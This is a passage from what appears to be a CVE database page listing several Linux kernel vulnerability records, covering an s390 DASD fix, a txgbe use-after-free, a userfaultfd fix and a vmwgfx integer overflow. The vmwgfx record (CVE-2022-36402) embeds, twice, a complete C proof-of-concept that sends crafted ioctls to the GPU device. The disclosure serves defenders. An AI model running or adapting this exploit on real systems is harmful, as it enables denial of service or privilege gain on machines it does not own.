          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.3"
            },
            {
              "lessThan": "5.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/dasd: fix error recovery leading to data corruption on ESE devices\n\nExtent Space Efficient (ESE) or thin provisioned volumes need to be\nformatted on demand during usual IO processing.\n\nThe dasd_ese_needs_format function checks for error codes that signal\nthe non existence of a proper track format.\n\nThe check for incorrect length is to imprecise since other error cases\nleading to transport of insufficient data also have this flag set.\nThis might lead to data corruption in certain error cases for example\nduring a storage server warmstart.\n\nFix by removing the check for incorrect length and replacing by\nexplicitly checking for invalid track format in transport mode.\n\nAlso remove the check for file protected since this is not a valid\nESE handling case."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:31:22.388Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/19f60a55b2fda49bc4f6134a5f6356ef62ee69d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/e245a18281c252c8dbc467492e09bb5d4b012118"
        },
        {
          "url": "https://git.kernel.org/stable/c/a665e3b7ac7d5cdc26e00e3d0fc8fd490e00316a"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a228896a1b3654cd461ff654f6a64e97a9c3246"
        },
        {
          "url": "https://git.kernel.org/stable/c/93a7e2856951680cd7fe6ebd705ac10c8a8a5efd"
        },
        {
          "url": "https://git.kernel.org/stable/c/5d4a304338daf83ace2887aaacafd66fe99ed5cc"
        },
        {
          "url": "https://git.kernel.org/stable/c/7db4042336580dfd75cb5faa82c12cd51098c90b"
        }
      ],
      "title": "s390/dasd: fix error recovery leading to data corruption on ESE devices",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45026",
    "datePublished": "2024-09-11T15:13:58.396Z",
    "dateReserved": "2024-08-21T05:34:56.685Z",
    "dateUpdated": "2025-11-03T22:15:37.529Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42112 (GCVE-0-2024-42112)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 12:57

Title

net: txgbe: free isb resources at the right time

Summary

In the Linux kernel, the following vulnerability has been resolved: net: txgbe: free isb resources at the right time When using MSI/INTx interrupt, the shared interrupts are still being handled in the device remove routine, before free IRQs. So isb memory is still read after it is freed. Thus move wx_free_isb_resources() from txgbe_close() to txgbe_remove(). And fix the improper isb free action in txgbe_open() error handling path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/efdc3f54299835dde…
	https://git.kernel.org/stable/c/935124dd5883b5de6…

Impacted products

Vendor

Product

Version

Linux

Affected: aefd013624a10f39b0bfaee8432a235128705380 , < efdc3f54299835ddef23bea651c753c4d467010b (git)
Affected: aefd013624a10f39b0bfaee8432a235128705380 , < 935124dd5883b5de68dc5a94f582480a10643dc9 (git)
Affected: ffe8a87463c8bb885c42ed54540d06ed041e76dc (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.263Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/efdc3f54299835ddef23bea651c753c4d467010b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/935124dd5883b5de68dc5a94f582480a10643dc9"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42112",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:26.486889Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:06.438Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/wangxun/libwx/wx_lib.c",
            "drivers/net/ethernet/wangxun/ngbe/ngbe_main.c",
            "drivers/net/ethernet/wangxun/txgbe/txgbe_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "efdc3f54299835ddef23bea651c753c4d467010b",
              "status": "affected",
              "version": "aefd013624a10f39b0bfaee8432a235128705380",
              "versionType": "git"
            },
            {
              "lessThan": "935124dd5883b5de68dc5a94f582480a10643dc9",
              "status": "affected",
              "version": "aefd013624a10f39b0bfaee8432a235128705380",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ffe8a87463c8bb885c42ed54540d06ed041e76dc",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/wangxun/libwx/wx_lib.c",
            "drivers/net/ethernet/wangxun/ngbe/ngbe_main.c",
            "drivers/net/ethernet/wangxun/txgbe/txgbe_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: txgbe: free isb resources at the right time\n\nWhen using MSI/INTx interrupt, the shared interrupts are still being\nhandled in the device remove routine, before free IRQs. So isb memory\nis still read after it is freed. Thus move wx_free_isb_resources()\nfrom txgbe_close() to txgbe_remove(). And fix the improper isb free\naction in txgbe_open() error handling path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:41.377Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/efdc3f54299835ddef23bea651c753c4d467010b"
        },
        {
          "url": "https://git.kernel.org/stable/c/935124dd5883b5de68dc5a94f582480a10643dc9"
        }
      ],
      "title": "net: txgbe: free isb resources at the right time",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42112",
    "datePublished": "2024-07-30T07:46:06.237Z",
    "dateReserved": "2024-07-29T15:50:41.176Z",
    "dateUpdated": "2025-05-04T12:57:41.377Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-36402 (GCVE-0-2022-36402)

Vulnerability from cvelistv5 – Published: 2022-09-16 16:08 – Updated: 2024-09-17 03:38

Title

There is an int overflow vulnerability in vmwgfx driver

Summary

An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-118 - Incorrect Access of Indexable Resource ('Range Error')

Assigner

Anolis

References

URL

Tags

https://bugzilla.openanolis.cn/show_bug.cgi?id=2072

x_refsource_MISC

Impacted products

	Vendor	Product	Version
	Linux	kernel	Affected: v4.3-rc1 , < 5.13.0-52* (custom)

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:00:04.458Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.3-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-118",
              "description": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-16T16:08:01",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an int overflow vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-36402",
          "STATE": "PUBLIC",
          "TITLE": "There is an int overflow vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.3-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-36402",
    "datePublished": "2022-09-16T16:08:01.414003Z",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-09-17T03:38:12.736Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41027 (GCVE-0-2024-41027)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:31 – Updated: 2025-11-03 21:59

Title

Fix userfaultfd_api to return EINVAL as expected

Summary

In the Linux kernel, the following vulnerability has been resolved: Fix userfaultfd_api to return EINVAL as expected Currently if we request a feature that is not set in the Kernel config we fail silently and return all the available features. However, the man page indicates we should return an EINVAL. We need to fix this issue since we can end up with a Kernel warning should a program request the feature UFFD_FEATURE_WP_UNPOPULATED on a kernel with the config not set with this feature. [ 200.812896] WARNING: CPU: 91 PID: 13634 at mm/memory.c:1660 zap_pte_range+0x43d/0x660 [ 200.820738] Modules linked in: [ 200.869387] CPU: 91 PID: 13634 Comm: userfaultfd Kdump: loaded Not tainted 6.9.0-rc5+ #8 [ 200.877477] Hardware name: Dell Inc. PowerEdge R6525/0N7YGH, BIOS 2.7.3 03/30/2022 [ 200.885052] RIP: 0010:zap_pte_range+0x43d/0x660

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/519547760f16eae78…
	https://git.kernel.org/stable/c/14875fd5f9bcf60ac…
	https://git.kernel.org/stable/c/cd94cac4069a763ab…
	https://git.kernel.org/stable/c/8111f902b7c95d75f…
	https://git.kernel.org/stable/c/1723f04caacb32cad…

Impacted products

Vendor

Product

Version

Linux

Affected: e06f1e1dd4998ffc9da37f580703b55a93fc4de4 , < 519547760f16eae7803d2658d9524bc5ba7a20a7 (git)
Affected: e06f1e1dd4998ffc9da37f580703b55a93fc4de4 , < 14875fd5f9bcf60ac5518c63bfb676ade44aa7c6 (git)
Affected: e06f1e1dd4998ffc9da37f580703b55a93fc4de4 , < cd94cac4069a763ab5206be2c64c9a8beae590ba (git)
Affected: e06f1e1dd4998ffc9da37f580703b55a93fc4de4 , < 8111f902b7c95d75fc80c7e577f5045886c6b384 (git)
Affected: e06f1e1dd4998ffc9da37f580703b55a93fc4de4 , < 1723f04caacb32cadc4e063725d836a0c4450694 (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:26.365Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/519547760f16eae7803d2658d9524bc5ba7a20a7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/14875fd5f9bcf60ac5518c63bfb676ade44aa7c6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd94cac4069a763ab5206be2c64c9a8beae590ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8111f902b7c95d75fc80c7e577f5045886c6b384"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1723f04caacb32cadc4e063725d836a0c4450694"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41027",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:05.908996Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:04.366Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/userfaultfd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "519547760f16eae7803d2658d9524bc5ba7a20a7",
              "status": "affected",
              "version": "e06f1e1dd4998ffc9da37f580703b55a93fc4de4",
              "versionType": "git"
            },
            {
              "lessThan": "14875fd5f9bcf60ac5518c63bfb676ade44aa7c6",
              "status": "affected",
              "version": "e06f1e1dd4998ffc9da37f580703b55a93fc4de4",
              "versionType": "git"
            },
            {
